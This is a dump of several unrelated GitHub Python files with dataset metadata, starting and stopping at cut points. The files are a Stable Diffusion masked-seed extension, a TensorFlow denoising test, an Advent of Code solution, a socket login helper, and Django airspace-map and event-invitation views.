torch.ones_like(noise)\n mask_float = mask_float * mask * 0.05\n start_noise = subnoise\n new_noise = mask_float * subnoise + (1 - mask_float) * noise\n low_norm = noise/torch.norm(noise, dim=1, keepdim=True)\n high_norm = new_noise/torch.norm(new_noise, dim=1, keepdim=True)\n return new_noise\n\n\ndef get_new_prompt(prompts, p):\n with devices.autocast():\n c = prompt_parser.get_multicond_learned_conditioning(shared.sd_model, [prompts], p.steps)\n return c\n\n\n# from https://discuss.pytorch.org/t/help-regarding-slerp-function-for-generative-model-sampling/32475/3\ndef slerp_no_mask(val, low, high):\n global start_noise\n global mask\n if mask.dtype != torch.bool:\n mask = mask.bool()\n if mask.ndim ==3:\n mask[3,:,:] = mask[0,:,:]\n start_noise = high\n low_norm = low/torch.norm(low, dim=1, keepdim=True)\n high_norm = high/torch.norm(high, dim=1, keepdim=True)\n dot = (low_norm*high_norm).sum(1)\n\n if dot.mean() > 0.9995:\n return low * val + high * (1 - val)\n\n omega = torch.acos(dot)\n so = torch.sin(omega)\n res = (torch.sin((1.0-val)*omega)/so).unsqueeze(1)*low + (torch.sin(val*omega)/so).unsqueeze(1) * high\n return res\n\n@torch.no_grad()\ndef sample_euler_with_mask(model, x, sigmas, extra_args=None, callback=None, disable=None, s_churn=0., s_tmin=0., s_tmax=float('inf'), s_noise=1.):\n global mask\n global seednew\n global run_denosing_different_seed\n global intermediate_step_different_seed\n global apply_intermediate_denoising\n global intermediate_step\n global new_cond\n global new_pr\n global alpha\n global new_seed_list\n\n\n \"\"\"Implements Algorithm 2 (Euler steps) from Karras et al. (2022).\"\"\"\n extra_args = {} if extra_args is None else extra_args\n s_in = x.new_ones([x.shape[0]])\n for i in trange(len(sigmas) - 1, disable=disable):\n gamma = min(s_churn / (len(sigmas) - 1), 2 ** 0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.\n eps = torch.randn_like(x) * s_noise\n sigma_hat = sigmas[i] * (gamma + 1)\n if gamma > 0:\n x = x + eps * (sigma_hat ** 2 - sigmas[i] ** 2) ** 0.5\n\n if run_denosing_different_seed:\n # running denoising with a different seed\n extra_args2 = copy.deepcopy(extra_args)\n # if new_pr != '':\n # extra_args2['cond'] = new_cond\n denoised2 = model(start_noise, sigma_hat * s_in, **extra_args2)\n d2 = to_d(start_noise, sigma_hat, denoised2)\n dt2 = sigmas[i + 1] - sigma_hat\n start_noise = start_noise + d2 * dt2\n\n # combine them after certain number of iterations\n if i > intermediate_step_different_seed:\n x = mask * start_noise + mask.bitwise_not() * x\n start_noise = x\n if new_pr != '':\n extra_args['cond'] = new_cond \n \n \n denoised = model(x, sigma_hat * s_in, **extra_args)\n\n if apply_intermediate_denoising:\n previous_denoised = denoised\n for j in range(len(step_list)):\n step = int(step_list[j])\n if i == step:\n masks = prepare_mask(masks_list)\n denoinsed_masked = torch.zeros_like(denoised)\n if mask_active_list[j]:\n mask = masks_list[j]\n mask = mask.bool()\n mask[3,:,:] = mask[0,:,:]\n mask = mask.unsqueeze(0)\n masks = masks + mask\n if new_seed_list[j] == -1:\n new_seed_list[j] = int(random.randrange(4294967294))\n start_noise = devices.randn(new_seed_list[j], [4,64,64]).unsqueeze(0)\n start_noise = start_noise * sigmas[int(sigma_step_list[j])]\n denoinsed_masked += (previous_denoised + 5* alpa_list[j] * start_noise) * mask\n \n denoised = denoinsed_masked + masks.bitwise_not() * denoised\n\n \n d = to_d(x, sigma_hat, denoised)\n if callback is not None:\n callback({'x': x, 'i': i, 'sigma': sigmas[i], 'sigma_hat': sigma_hat, 'denoised': denoised})\n dt = sigmas[i + 1] - sigma_hat\n # Euler method\n x = x + d * dt\n return x\n\n@torch.no_grad()\ndef sample_euler(model, x, sigmas, extra_args=None, callback=None, disable=None, s_churn=0., s_tmin=0., s_tmax=float('inf'), s_noise=1.):\n \"\"\"Implements Algorithm 2 (Euler steps) from Karras et al. (2022).\"\"\"\n extra_args = {} if extra_args is None else extra_args\n s_in = x.new_ones([x.shape[0]])\n for i in trange(len(sigmas) - 1, disable=disable):\n gamma = min(s_churn / (len(sigmas) - 1), 2 ** 0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.\n eps = torch.randn_like(x) * s_noise\n sigma_hat = sigmas[i] * (gamma + 1)\n if gamma > 0:\n x = x + eps * (sigma_hat ** 2 - sigmas[i] ** 2) ** 0.5\n denoised = model(x, sigma_hat * s_in, **extra_args)\n d = to_d(x, sigma_hat, denoised)\n if callback is not None:\n callback({'x': x, 'i': i, 'sigma': sigmas[i], 'sigma_hat': sigma_hat, 'denoised': denoised})\n dt = sigmas[i + 1] - sigma_hat\n # Euler method\n x = x + d * dt\n return x\n\ndef gr_show(visible=True):\n return {\"visible\": visible, \"__type__\": \"update\"}\n\ndef prepare_masks(mask_list, active_mask_flag_list):\n masks = []\n for i in range(len(mask_list)):\n if mask_list[i] is None:\n masks.append(torch.zeros(4,64,64).cuda())\n else:\n resized_mask = mask_list[i]['mask'].resize((64,64), Image.NEAREST)\n masks.append(torch.from_numpy(np.array(resized_mask)).permute(2,0,1).cuda())\n return masks\ndef create_active_masks(mask_list, active_mask_flag_list):\n masks = []\n for i in range(len(mask_list)):\n if mask_list[i] is None:\n masks.append(torch.zeros(4,64,64).cuda())\n else:\n resized_mask = mask_list[i]['mask'].resize((64,64), Image.NEAREST)\n masks.append(torch.from_numpy(np.array(resized_mask)).permute(2,0,1).cuda())\n \n active_mask = torch.zeros_like(masks[0]).cuda()\n for i in range(len(masks)):\n active_mask = active_mask + active_mask_flag_list[i] * masks[i]\n \n return active_mask\n\ndef variable_outputs(k):\n max_textboxes = 10\n k = int(k)\n return [gr.Textbox.update(visible=True)]*k + [gr.Textbox.update(visible=False)]*(max_textboxes-k)\ndef prepare_mask(masks_list):\n masks = torch.zeros_like(masks_list[0])\n masks = masks.bool()\n masks[3,:,:] = masks[0,:,:]\n masks = masks.unsqueeze(0)\n return masks\ndef variable_outputs_tab(k):\n max_textboxes = 10\n k = int(k)\n return [gr.Textbox.update(visible=True)]*k + [gr.Textbox.update(visible=False)]*(max_textboxes-k)\n\n\n\nclass Script(scripts.Script):\n \n GRID_LAYOUT_AUTO = \"Auto\"\n GRID_LAYOUT_PREVENT_EMPTY = \"Prevent Empty Spot\"\n GRID_LAYOUT_BATCH_LENGTH_AS_ROW = \"Batch Length As Row\"\n \n def title(self):\n return \"seed_mask\"\n\n def show(self, is_img2img):\n return scripts.AlwaysVisible\n\n def ui(self, is_img2img):\n \n with gr.Row():\n is_active = gr.Checkbox(\n label=\"seed_mask\",\n value=False)\n mask_intermediate = gr.Checkbox(\n label=\"mask_intermediate\",\n value=False)\n \n\n with FormRow().style(equal_height=False):\n with gr.Column(variant='compact', elem_id=\"diffusion_brush_settings\"):\n copy_image_buttons = []\n copy_image_destinations = {}\n\n def add_copy_image_controls(tab_name, elem):\n with gr.Row(variant=\"compact\", elem_id=f\"magic_brush_copy_to_{tab_name}\"):\n gr.HTML(\"Copy image to: \", elem_id=f\"magic_brush_label_copy_to_{tab_name}\")\n\n for title, name in zip(['mask1', 'mask2', 'mask3'], ['mask1', 'mask2', 'mask3']):\n if name == tab_name:\n gr.Button(title, interactive=False)\n copy_image_destinations[name] = elem\n continue\n\n button = gr.Button(title)\n copy_image_buttons.append((button, name, elem))\n mask_list = []\n mask_active_list = []\n alpa_list = []\n step_list = []\n new_seed_list = []\n sigma_step_list = []\n with gr.Tabs(elem_id=\"magic_brush\"):\n with gr.TabItem('mask1', id='mask1', elem_id=\"mask1_tab\") as tab_mask1:\n with FormRow().style(equal_height=False):\n enable_mask_1 = gr.Checkbox(label=\"enable mask 1\",value=False)\n mask_active_list.append(enable_mask_1.value)\n alpha_1 = gr.Slider(minimum=0.0, maximum=5.0, step=0.01, value=0.52 ,label='alpha1', elem_id=\"alpha_1\")\n alpa_list.append(alpha_1)\n with FormRow().style(equal_height=False):\n step1 = gr.Number(label='step1', placeholder=\"20\")\n step_list.append(step1)\n new_seed_1 = gr.Number(label='new_seed_1', value=-1)\n new_seed_list.append(new_seed_1)\n sigma_step_input1 = gr.Number(label='sigma_step1', value=0)\n sigma_step_list.append(sigma_step_input1)\n\n \n init_img_with_mask_1 = gr.Image(label=\"Image for brushing with mask1\", show_label=False, elem_id=\"img2maskimg1\", source=\"upload\", interactive=True, type=\"pil\", tool=\"sketch\", image_mode=\"RGBA\").style(height=480)\n add_copy_image_controls('mask1', init_img_with_mask_1)\n mask_list.append(init_img_with_mask_1)\n\n with gr.TabItem('mask2', id='mask2', elem_id=\"mask2_tab\") as tab_mask2:\n with gr.Row():\n enable_mask_2 = gr.Checkbox(label=\"enable mask 2\",value=False)\n mask_active_list.append(enable_mask_2.value)\n alpha_2 = gr.Slider(label='alpha2', minimum=0.0, maximum=5.0, step=0.01, value=0.5, elem_id=\"alpha_2\")\n alpa_list.append(alpha_2)\n with gr.Row():\n step2 = gr.Number(label='step2', placeholder=\"20\")\n step_list.append(step2)\n new_seed_2 = gr.Number(label='new_seed 2', value=-1)\n new_seed_list.append(new_seed_2)\n sigma_step_input2 = gr.Number(label='sigma_step2', value=0)\n sigma_step_list.append(sigma_step_input2)\n with gr.Row():\n init_img_with_mask_2 = gr.Image(label=\"Image for brushing with mask2\", show_label=False, elem_id=\"img2maskimg2\", source=\"upload\", interactive=True, type=\"pil\", tool=\"sketch\", image_mode=\"RGBA\").style(height=480)\n add_copy_image_controls('mask2', init_img_with_mask_2)\n mask_list.append(init_img_with_mask_2)\n\n with gr.TabItem('mask3', id='mask3', elem_id=\"mask3_tab\") as tab_mask3:\n with gr.Row():\n enable_mask_3 = gr.Checkbox(label=\"enable mask 3\",value=False)\n mask_active_list.append(enable_mask_3.value)\n alpha_3 = gr.Slider(label='alpha3', minimum=0.0, maximum=5.0, step=0.01, value=0.51, elem_id=\"alpha_3\")\n alpa_list.append(alpha_3)\n with gr.Row():\n step3 = gr.Number(label='step3', placeholder=\"20\")\n step_list.append(step3)\n new_seed_3 = gr.Number(label='new_seed 3', value=-1)\n new_seed_list.append(new_seed_3)\n sigma_step_input3 = gr.Number(label='sigma_step3', value=0)\n sigma_step_list.append(sigma_step_input3)\n\n with gr.Row():\n init_img_with_mask_3 = gr.Image(label=\"Image for brushing with mask3\", show_label=False, elem_id=\"img2maskimg3\", source=\"upload\", interactive=True, type=\"pil\", tool=\"sketch\", image_mode=\"RGBA\").style(height=480)\n add_copy_image_controls('mask3', init_img_with_mask_3)\n mask_list.append(init_img_with_mask_3)\n\n\n def copy_image(img):\n if isinstance(img, dict) and 'image' in img:\n return img['image']\n\n return img\n\n for button, name, elem in copy_image_buttons:\n button.click(\n fn=copy_image,\n inputs=[elem],\n outputs=[copy_image_destinations[name]],\n )\n button.click(\n fn=lambda: None,\n _js=\"switch_to_\"+name.replace(\" \", \"_\"),\n inputs=[],\n outputs=[],\n )\n\n def select_magic_brush_tab(tab):\n return gr.update(visible=tab in [2, 3, 4]), gr.update(visible=tab == 3),\n\n for i, elem in enumerate([tab_mask1, tab_mask2]):\n elem.select(\n fn=lambda tab=i: select_magic_brush_tab(tab),\n inputs=[],\n outputs=[],\n )\n mask_dict = {}\n mask_dict['mask'] = mask_list\n mask_dict['is_active'] = mask_active_list\n mask_dict['alpha'] = alpa_list\n mask_dict['step'] = step_list\n\n with gr.Row():\n run_denosing_different_seed_input = gr.Checkbox(label=\"run denosing_different seed\",value=False, visible=False)\n intermediate_step_different_seed_input = gr.Number(label='intermediate step different seed', placeholder=\"10\", visible=False)\n new_seed_intermediate = gr.Number(label='new_seed', value=-1, visible=False)\n new_prompt = gr.Textbox(label='new prompt', placeholder=\"new prompt to use\", visible=False)\n with gr.Row():\n apply_intermediate_denoising_input = gr.Checkbox(label=\"apply intermediate denoising\",value=False)\n intermediate_step_input = gr.Number(label='intermediate step', placeholder=\"20\", visible=False)\n alpha_input = gr.Slider(label='alpha', min=0, max=1, step=0.1, default=0.0, visible=False)\n \n\n return [is_active, mask_intermediate, new_seed_intermediate, new_prompt, run_denosing_different_seed_input, intermediate_step_different_seed_input, apply_intermediate_denoising_input, intermediate_step_input, alpha_input,\n init_img_with_mask_1, init_img_with_mask_2, init_img_with_mask_3,\n enable_mask_1, enable_mask_2, enable_mask_3,\n step1, step2, step3,\n alpha_1, alpha_2, alpha_3,\n new_seed_1, new_seed_2, new_seed_3,\n sigma_step_input1, sigma_step_input2, sigma_step_input3]\n \n def process(self,p, is_active, mask_intermediate, new_seed, new_prompt, run_denosing_different_seed_input, intermediate_step_different_seed_input, apply_intermediate_denoising_input, intermediate_step_input, alpha_input,\n init_img_with_mask_1, init_img_with_mask_2, init_img_with_mask_3,\n enable_mask_1, enable_mask_2, enable_mask_3,\n step1, step2, step3,\n alpha_1, alpha_2, alpha_3,\n new_seed_1, new_seed_2, new_seed_3, \n sigma_step_input1, sigma_step_input2, sigma_step_input3):\n \n global mask\n global start_noise\n global seednew \n global new_cond\n global run_denosing_different_seed\n global intermediate_step_different_seed\n global apply_intermediate_denoising\n global intermediate_step\n global new_pr \n global alpha\n \n global masks_list\n global mask_active_list\n global step_list\n global alpa_list\n global new_seed_list\n global sigma_step_list\n sigma_step = sigma_step_input1\n new_pr = new_prompt\n run_denosing_different_seed = run_denosing_different_seed_input\n intermediate_step_different_seed = intermediate_step_different_seed_input\n apply_intermediate_denoising = mask_intermediate\n intermediate_step = intermediate_step_input\n seednew = new_seed\n alpha = alpha_input\n \n mask = torch.zeros(4,64,64).cuda()\n new_cond = get_new_prompt(new_prompt, p)\n\n masks_list = [init_img_with_mask_1, init_img_with_mask_2, init_img_with_mask_3]\n mask_active_list = [enable_mask_1, enable_mask_2, enable_mask_3]\n step_list = [step1, step2, step3]\n alpa_list = [alpha_1, alpha_2, alpha_3]\n new_seed_list = [new_seed_1, new_seed_2, new_seed_3]\n sigma_step_list = [sigma_step_input1, sigma_step_input2, sigma_step_input3]\n masks_list = prepare_masks(masks_list, mask_active_list)\n\n if is_active:\n resized_mask = mask_dict['mask'].resize((64,64), Image.NEAREST)\n mask = torch.from_numpy(np.array(resized_mask)).permute(2,0,1).cuda()\n modules.processing.slerp = slerp_with_mask\n if mask_intermediate:\n k_diffusion.sampling.sample_euler = sample_euler_with_mask\n else:\n k_diffusion.sampling.sample_euler = sample_euler\n else:\n modules.processing.slerp = slerp_no_mask\n \n if mask_intermediate:\n k_diffusion.sampling.sample_euler = sample_euler_with_mask\n else:\n k_diffusion.sampling.sample_euler = sample_euler\n\n# to save:\n# c = mask.squeeze(0).permute(2,1,0).cpu().numpy().astype('uint8')\n# c = Image.fromarray(c)\n# c.save('test.png')\n","repo_name":"peymoon/diffusion_brush","sub_path":"diffusion_brush/scripts/diffusion_brush.py","file_name":"diffusion_brush.py","file_ext":"py","file_size_in_byte":19228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73042935842","text":"#coding:utf-8\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport dataset\nfrom keras.layers import MaxPooling2D, UpSampling2D, Conv2D,LeakyReLU\nfrom skimage.measure import compare_ssim as ssim\n\nbatch_size=30\n#输入测试图像\ntestimages=dataset.show_images('Image_Denoising/',256)\n#lrelu函数\ndef lrelu(x, alpha=0.1):\n return tf.maximum(alpha * x, x)\n\n#输入到网络的数据\n#图片28*28,color_channel是1\nimg_input = tf.placeholder(tf.float32, [None, 256, 256, 1])\n#原始数据\ntargets_ = tf.placeholder(tf.float32, [None, 256, 256, 1])\nlearning_rate = tf.placeholder(tf.float32)\n\nconv1 = tf.layers.conv2d(img_input, filters=32,kernel_size=(5, 5),strides=(1, 1),padding='SAME',use_bias=True,activation=tf.nn.relu )\nconv1=tf.layers.conv2d(conv1,filters=64,kernel_size=(1,1),strides=(1,1),padding='same',use_bias=True,activation=tf.nn.relu)\n\nconv2 = tf.layers.conv2d(img_input, filters=64,kernel_size=(3,3),strides=(1, 1),padding='SAME',use_bias=True,activation=tf.nn.relu )\nconv3 = tf.layers.conv2d(img_input, filters=64,kernel_size=(1,1),strides=(1, 1),padding='SAME',use_bias=True,activation=tf.nn.relu)\n\navepool=tf.layers.average_pooling2d(img_input,pool_size=(3,3),strides=1,padding='SAME')\navepool=tf.layers.conv2d(avepool,filters=32,kernel_size=(1,1),strides=(1,1),padding='SAME',use_bias=True,activation=tf.nn.relu)\n\nconv_1=tf.concat(axis=3,values=[conv1,conv2,conv3,avepool])\nconv_1=tf.layers.batch_normalization(conv_1,axis=3)\n\nmaxpool1 = tf.layers.max_pooling2d(conv_1,pool_size=(2, 2),strides=(2, 2) )\n\n\nconv4 = tf.layers.conv2d(maxpool1, filters=32,kernel_size=(5,5),strides=(1, 1),padding='SAME',use_bias=True,activation='relu', )\nconv5 = tf.layers.conv2d(maxpool1, filters=32,kernel_size=(3,3),strides=(1, 1),padding='SAME',use_bias=True,activation='relu', )\nconv6 = tf.layers.conv2d(maxpool1, filters=32,kernel_size=(9,9),strides=(1, 1),padding='SAME',use_bias=True,activation='relu', )\nconv6_6=tf.layers.conv2d(maxpool1, filters=32,kernel_size=(7,7),strides=(1,1),padding='SAME',use_bias=True,activation='relu')\nconv_2=tf.concat(axis=3,values=[conv5,conv4,conv6_6,conv6])\nconv_2=tf.layers.batch_normalization(conv_2,axis=3)\n\n\n\nupsamples2 = tf.layers.conv2d_transpose(conv_2,filters=32,kernel_size=(3,3),padding='SAME',strides=(2,2),name='upsamples2')\nupsamples2=tf.layers.dropout(upsamples2)\nprint(upsamples2.shape)\n\n\nlogits = tf.layers.conv2d_transpose(upsamples2,filters=1,kernel_size=(3, 3),strides=(1, 1),name='logits',padding='SAME',use_bias=True)\nlogits=tf.layers.batch_normalization(logits,axis=3)\n\n# 此时的数据是 256x256x1\n # 通过sigmoid传递logits以获得重建图像\n\nlogits_=tf.add(img_input,logits)\nlogits_=tf.nn.relu(logits_)\n\ndecoded = tf.sigmoid(logits_, name='recon')\n\nwith tf.name_scope('cost'):\n # 定义损失函数和优化器\n loss = tf.nn.sigmoid_cross_entropy_with_logits(\n logits=logits, labels=targets_)\n #误差\n cost = tf.reduce_mean(loss)\n tf.summary.scalar('cost', cost)\nopt = tf.train.AdamOptimizer(learning_rate).minimize(cost)\n\n#设置要保存的变量\n#设置要保存的变量\nsaver = tf.train.Saver(tf.global_variables())\ninit = tf.global_variables_initializer()\n\n\nwith tf.Session() as sess:\n sess.run(init)\n summary_writer = tf.summary.FileWriter('logs/test_logs',sess.graph_def)\n #恢复变量\n saver.restore(sess,'encode_model1/model_cnn_train27_best.ckpt')\n index=0\n #添加噪声\n #noisy_im = sess.run(noisy_image,feed_dict={content_image_place_shape:content_image.shape,content_image_place:content_image/1.0})\n for i in testimages:\n index+=1\n img = i\n noisyImage = dataset.gaussian(i, 25)\n # img = dataset.pretrain_images(img)\n # noisyImage = dataset.pretrain_images(noisyImage)\n if img.ndim==2:\n img=img[None,...,None]\n if noisyImage.ndim==2:\n noisyImage=noisyImage[None,...,None]\n img=dataset.pretrain_images(img)\n noisyImage=dataset.pretrain_images(noisyImage)\n\n #预测\n pred = sess.run(decoded, feed_dict={img_input:noisyImage})\n\n psnr_score1 = tf.image.psnr(pred, img, max_val=1) # 去噪图psnr\n psnr_score2 = tf.image.psnr(noisyImage, img, max_val=1) # 噪声图psnr\n # ssim1=ssim(pred, img,multichannel=True)\n\n with tf.Session() as sess1:\n psnr_score1 = sess1.run(psnr_score1)\n psnr_score2 = sess1.run(psnr_score2)\n\n print(psnr_score1)\n # print(ssim1)\n\n im_out_denoisy = np.clip(pred[0, ..., 0] * 255, 0, 255).astype(np.uint8)\n # im_noisy = np.clip(img[0, ...,0]*255,0,255).astype(np.uint8)\n cv2.imwrite('Image_test\\\\' + str(index) + '.jpg', im_out_denoisy)\n # cv2.imwrite('Image_test_Noise\\\\'+str(index)+'.jpg',)\n\n\n# im_out_noisy = np.clip(test_x[0, ...,0]*255,0,255).astype(np.uint8)\n# im_out_denoisy = np.clip(pred[0, ...,0]*255,0,255).astype(np.uint8)\n\n#Clear Image\n\n\n#显示图像\n# plt.subplot(131)\n# plt.title('noisy')\n# plt.imshow(img_normal,cmap='gray')\n#Noisy Image\nplt.subplot(132)\nplt.title('noisy')\n# plt.imshow(im_noisy,cmap='gray')\n#Denoisy Image\n# plt.subplot(133)\nplt.title('pred')\nplt.imshow(im_out_denoisy,cmap='gray')\nplt.show()\n","repo_name":"ycy950519/ImageDenoising","sub_path":"DenoidingAutoencoderTest.py","file_name":"DenoidingAutoencoderTest.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"29454196743","text":"def ReadInput(ficheiro):\r\n f=open(ficheiro,\"r\")\r\n a=[]\r\n \r\n linha=f.readline()\r\n while(linha):\r\n linha=linha.strip(\"\\n\").strip(\" \")\r\n linha=int(linha)\r\n a.append(linha)\r\n linha=f.readline()\r\n \r\n f.close()\r\n return a\r\n\r\ndef Combinations(lista):\r\n combo=[]\r\n\r\n for i in range(len(lista)):\r\n for j in range(i+1,len(lista)):\r\n combo.append([lista[i],lista[j]])\r\n\r\n return combo\r\n\r\ndef FindSequence(lista,magicN):\r\n pointer=0\r\n lenght=1\r\n while(1):\r\n if(pointer+lenght>=len(lista)):\r\n pointer+=1\r\n lenght=1\r\n\r\n seq=lista[pointer:pointer+lenght]\r\n\r\n if(sum(seq))>magicN:\r\n pointer+=1\r\n lenght=1\r\n \r\n if(sum(seq)==magicN):\r\n return seq\r\n \r\n lenght+=1\r\n return -1\r\n\r\n \r\n\r\ndef main():\r\n inp=ReadInput(\"9.txt\")\r\n preamble=25\r\n #magicN=127\r\n magicN=1038347917\r\n \r\n pointer=preamble\r\n while(pointer<len(inp)):\r\n combo=Combinations(inp[pointer-preamble:pointer])\r\n combo=list(map(lambda x: x[0]+x[1],combo))\r\n if(inp[pointer] not in combo):\r\n print(inp[pointer])\r\n pointer+=1\r\n \r\n seq=FindSequence(inp,magicN)\r\n seq.sort()\r\n print(seq)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"FranciscoBrilhante/Advent-of-Code-2020","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1145613277","text":"\n\nimport json\n\nfrom banco import insert, select\n\n\nclass Login():\n def __init__(self, info):\n self.id = '-1'\n self._login(info)\n\n def _login(self, texto=\"\"):\n j = json.loads(texto)\n # print(j)\n if('id' in j):\n self.id = j['id']\n else:\n insert({'nome': j['nome'], 'xp': 0,\n 'lv': 0, 'pontos': 0}, 'clientes')\n d = select(\n 'SELECT id FROM clientes WHERE nome=\"'+j['nome']+'\" AND xp=0 AND lv=0 AND pontos=0 ORDER BY id desc')\n self.id = d.iloc[0]['id']\n","repo_name":"ismael17-bot/TrabalhoRedesSockets","sub_path":"src/Servidor/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31439731540","text":"from django.shortcuts import render\nfrom django.core.serializers import serialize\nfrom django.http import HttpResponse\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic import CreateView\n\nfrom .models import ReserveAirspace\nfrom .forms import ReserveAirspaceForm\n\n\nclass HomePageView(TemplateView):\n\n template_name = \"maps/map.html\"\n\n # def get_context_data(self, **kwargs):\n # context = super().get_context_data(**kwargs)\n # context['latest_articles'] = Article.objects.all()[:5]\n # return context\n\n\ndef all_airspace_datasets(request):\n\n # serialize(\"geojson\", City.objects.all(), geometry_field=\"point\", fields=(\"name\",))\n my_reserve_airspace = ReserveAirspace.objects.all()\n path = serialize(\n \"geojson\",\n my_reserve_airspace,\n geometry_field=\"geom\",\n fields=(\"name\", \"centroid\"),\n )\n\n # print(path, \"path\")\n return HttpResponse(path, content_type=\"json\")\n\n\ndef my_reserve_datasets(request):\n airspace = serialize(\n \"geojson\", ReserveAirspace.objects.filter(created_by=request.user)\n )\n return HttpResponse(airspace, content_type=\"json\")\n\n\nclass ReserveAirspaceCreateView(CreateView):\n \"\"\" TO DO: Restrict Pending Flights to 10 to reduce spamming\n --FIXED by queryset count and if-else in templates\n \"\"\"\n\n form_class = ReserveAirspaceForm\n model = ReserveAirspace\n template_name = \"maps/create1.html\"\n success_url = \"/maps/map\"\n\n # def get_context_data(self, *args, **kwargs):\n # context = super(ReserveAirspaceCreateView, self).get_context_data(\n # *args, **kwargs\n # )\n\n # my_pending_airspaces = ReserveAirspace.objects.filter(\n # created_by=self.request.user\n # ).filter(status=0)\n\n # context[\"my_pending_approval_airspaces\"] = my_pending_airspaces.order_by(\"-id\")[\n # :10\n # ]\n # context[\"my_pending_approval_airspaces_count\"] = my_pending_airspaces.count()\n # # context['myflightlogs'] = FlightLog.objects.filter(user=thisuser)\n # return context\n\n\nclass OldReserveAirspaceCreateView(CreateView):\n \"\"\" TO DO: Restrict Pending Flights to 10 to reduce spamming\n --FIXED by queryset count and if-else in templates\n \"\"\"\n\n form_class = ReserveAirspaceForm\n model = ReserveAirspace\n template_name = \"maps/create3.html\"\n # success_url = \"/maps/map\"\n\n def post(self, request, *args, **kwargs):\n\n print(self.request, \"request\")\n print((self.request.POST), \"request.POST\")\n\n x = ReserveAirspace.objects.create(\n name=self.request.POST[\"name\"], geom=self.request.POST[\"geom\"]\n )\n\n print(x, \"x\")\n\n # def get_context_data(self, *args, **kwargs):\n # context = super(ReserveAirspaceCreateView, self).get_context_data(\n # *args, **kwargs\n # )\n\n # my_pending_airspaces = ReserveAirspace.objects.filter(\n # created_by=self.request.user\n # ).filter(status=0)\n\n # context[\"my_pending_approval_airspaces\"] = my_pending_airspaces.order_by(\"-id\")[\n # :10\n # ]\n # context[\"my_pending_approval_airspaces_count\"] = my_pending_airspaces.count()\n # # context['myflightlogs'] = FlightLog.objects.filter(user=thisuser)\n # return context\n\n\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\n\n\nclass ReserveCreateAPIView(APIView):\n permission_classes = (AllowAny,)\n # authentication_classes = (TokenAuthentication, SessionAuthentication)\n\n def post(self, request):\n import json\n\n print(request.data, \"in API\")\n name = request.data[\"name\"]\n # geom = json.loads(request.data[\"geom\"])\n geom = json.loads(request.data[\"geom\"])\n\n print(name, \"name\")\n print(geom, \"geom\")\n\n # print(json.loads(geom), \" type geom\")\n # print(dir(geom), \" dir geom\")\n\n \"\"\"\n\n {\n \"type\":\"FeatureCollection\",\n \"features\":[\n {\"type\":\"Feature\",\"properties\":{},\n \"geometry\":{\"type\":\"Polygon\",\n \"coordinates\":[\n [\n [36.901230812072754,-1.3365200875255174],\n [36.901230812072754,-1.3341603846017482],\n [36.903719902038574,-1.3341603846017482],\n [36.903719902038574,-1.3365200875255174],\n [36.901230812072754,-1.3365200875255174]\n ]\n ]\n }}\n ]}\n \"\"\"\n\n geom_type = geom[\"features\"][0][\"geometry\"][\"type\"]\n\n coords = geom[\"features\"][0][\"geometry\"][\"coordinates\"][0]\n print(coords, \"coords\")\n\n from django.contrib.gis.geos import (\n GEOSGeometry,\n LineString,\n MultiLineString,\n Polygon,\n )\n\n if geom_type == \"Polygon\":\n multi_line = Polygon(coords)\n print(multi_line, \"multi_line\")\n\n # line = LineString(coords)\n # print(line, \"line\")\n\n x = ReserveAirspace.objects.create(name=name, geom=multi_line)\n print(x, \"x instance\")\n\n return Response(\n {\"ResultDesc\": \"Reserve Airspace Created successfully\"},\n content_type=\"application/json\",\n status=status.HTTP_201_CREATED,\n )\n","repo_name":"geoffreynyaga/airmap-django","sub_path":"maps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37831475507","text":"from .forms import EventosForm, StaffForm, InvitacionesForm, EtiquetaForm\nfrom .models import Evento, Staff, Invitacion, Etiqueta\nfrom .utils import send_email, invitacion_activacion_token, make_qr\nfrom PIL import Image\nfrom User.models import User, Usuario\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail, EmailMultiAlternatives, EmailMessage\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render,redirect\nfrom django.template.loader import get_template\nfrom django.template.loader import render_to_string\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.views.generic import TemplateView, ListView\nimport qrcode\n\ndef nuevaInvitacion(request):\n \"\"\"\n Generar nueva invitación\n \"\"\"\n form = InvitacionesForm(request.POST or None)\n \n if form.is_valid():\n form.save()\n return redirect('Invitaciones')\n return render(request,'invitacionesForm.html',{'form':form})\n\ndef Invitaciones(request,evento_id):\n \"\"\"\n Vista de las invitaciones\n \"\"\"\n evento = Evento.objects.all()\n invitaciones= Invitacion.objects.all()\n return render(request,'invitaciones.html',{'invitaciones':invitaciones})\n\ndef RegisterEvent(request, id1, id2):\n \"\"\"\n Vista para registrar un evento\n \"\"\"\n evento = Evento.objects.get(pk=id1)\n # usuario = User.objects.get(pk=id2)\n usuario = request.user\n template = 'registerEvent.html'\n context = {'evento':evento, 'user':usuario}\n if request.method == 'POST':\n current_site = get_current_site(request)\n subject = 'Invitación a ' + evento.nombre\n content = 'Tienes una cita el día: ' + str(evento.fecha_inicio) + ' para el evento: ' + evento.nombre\n guest = 